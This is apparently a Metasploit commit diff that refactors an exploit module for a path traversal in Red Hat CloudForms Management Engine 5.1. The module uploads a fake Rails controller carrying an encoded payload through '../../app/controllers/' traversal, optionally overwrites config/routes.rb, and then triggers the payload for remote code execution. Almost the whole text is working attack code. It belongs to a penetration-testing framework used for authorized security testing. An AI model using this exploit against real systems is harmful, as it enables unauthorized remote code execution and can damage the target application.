Merge pull request #1 from jvazquez-r7/review_2745

Ramon de C Valle · Ramon de C Valle · commit 819236c6eccc · 2013-12-18T09:38:56.000-08:00
Clean pull request
diff --git a/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb b/modules/exploits/linux/http/cfme_manageiq_evm_upload_exec.rb
@@ -1,8 +1,6 @@
 ##
-# This file is part of the Metasploit Framework and may be subject to
-# redistribution and commercial restrictions. Please see the Metasploit
-# web site for more information on licensing and terms of use.
-#   http://metasploit.com/
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
@@ -15,10 +13,10 @@ def initialize
     super(
       'Name'           => 'Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal',
       'Description'    => %q{
-          This module exploits a path traversal vulnerability in the "linuxpkgs"
+        This module exploits a path traversal vulnerability in the "linuxpkgs"
         action of "agent" controller of the Red Hat CloudForms Management Engine 5.1
         (ManageIQ Enterprise Virtualization Manager 5.0 and earlier).
-          It uploads a fake controller to the controllers directory of the Rails
+        It uploads a fake controller to the controllers directory of the Rails
         application with the encoded payload as an action and sends a request to
         this action to execute the payload. Optionally, it can also upload a routing
         file containing a route to the action. (Which is not necessary, since the
@@ -40,33 +38,52 @@ def initialize
           ['Automatic', {}]
         ],
       'DisclosureDate' => 'Sep 4 2013',
-      'DefaultOptions' => { 'PrependFork' => true },
+      'DefaultOptions' =>
+        {
+          'PrependFork' => true,
+          'SSL' => true
+        },
       'DefaultTarget' => 0
     )
 
     register_options(
       [
         Opt::RPORT(443),
-        OptBool.new('SSL', [true, 'Use SSL', true]),
-        OptBool.new('ROUTES', [true, 'Upload a routing file', false]),
         OptString.new('CONTROLLER', [false, 'The name of the controller']),
         OptString.new('ACTION', [false, 'The name of the action']),
         OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
         OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ])
       ], self.class
     )
+
+    register_advanced_options(
+      [
+        OptBool.new('ROUTES', [true, 'Upload a routing file. Warning: It is not necessary by default and can damage the target application', false]),
+      ], self.class)
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri'    => normalize_uri(target_uri.path, "ping.html")
+    )
+
+    if res and res.code == 200 and res.body.to_s =~ /EVM ping response/
+      return Exploit::CheckCode::Detected
+    end
+
+    return Exploit::CheckCode::Unknown
   end
 
   def exploit
     controller =
-      if datastore['CONTROLLER'].nil? || datastore['CONTROLLER'].empty?
+      if datastore['CONTROLLER'].blank?
         Rex::Text.rand_text_alpha_lower(rand(9) + 3)
       else
         datastore['CONTROLLER'].downcase
       end
 
     action =
-      if datastore['ACTION'].nil? || datastore['ACTION'].empty?
+      if datastore['ACTION'].blank?
         Rex::Text.rand_text_alpha_lower(rand(9) + 3)
       else
         datastore['ACTION'].downcase
@@ -75,42 +92,37 @@ def exploit
     data = "class #{controller.capitalize}Controller < ApplicationController; def #{action}; #{payload.encoded}; render :nothing => true; end; end\n"
 
     print_status("Sending fake-controller upload request to #{target_url('agent', 'linuxpkgs')}...")
-    res = send_request_cgi(
-      'method' => datastore['HTTP_METHOD'],
-      'uri'    => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'),
-      "vars_#{datastore['HTTP_METHOD'].downcase}" => {
-        'data'     => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)),
-        'filename' => "../../app/controllers/#{controller}_controller.rb",
-        'md5'      => Rex::Text.md5(data)
-      }
-    )
+    res = upload_file("../../app/controllers/#{controller}_controller.rb", data)
 
-    fail_with(Failure::Unknown, 'No response from remote host') if res.nil?
+    fail_with(Failure::Unknown, 'No response from remote host') unless res and res.code == 500
 
     if datastore['ROUTES']
       data = "Vmdb::Application.routes.draw { root :to => 'dashboard#login'; match ':controller(/:action(/:id))(.:format)' }\n"
 
       print_status("Sending routing-file upload request to #{target_url('agent', 'linuxpkgs')}...")
-      res = send_request_cgi(
-        'method' => datastore['HTTP_METHOD'],
-        'uri'    => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'),
-        "vars_#{datastore['HTTP_METHOD'].downcase}" => {
-          'data'     => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)),
-          'filename' => '../../config/routes.rb',
-          'md5'      => Rex::Text.md5(data)
-        }
-      )
-
-      fail_with(Failure::Unknown, 'No response from remote host') if res.nil?
+      res = upload_file("../../config/routes.rb", data)
+      fail_with(Failure::Unknown, 'No response from remote host') unless res and res.code == 500
     end
 
     print_status("Sending execute request to #{target_url(controller, action)}...")
     send_request_cgi(
       'method' => 'POST',
       'uri'    => normalize_uri(target_uri.path, controller, action)
     )
+  end
+
+  def upload_file(filename, data)
+    res = send_request_cgi(
+      'method' => datastore['HTTP_METHOD'],
+      'uri'    => normalize_uri(target_uri.path, 'agent', 'linuxpkgs'),
+      "vars_#{datastore['HTTP_METHOD'].downcase}" => {
+        'data'     => Rex::Text.encode_base64(Rex::Text.zlib_deflate(data)),
+        'filename' => filename,
+        'md5'      => Rex::Text.md5(data)
+      }
+    )
 
-    handler
+    return res
   end
 
   def target_url(*args)
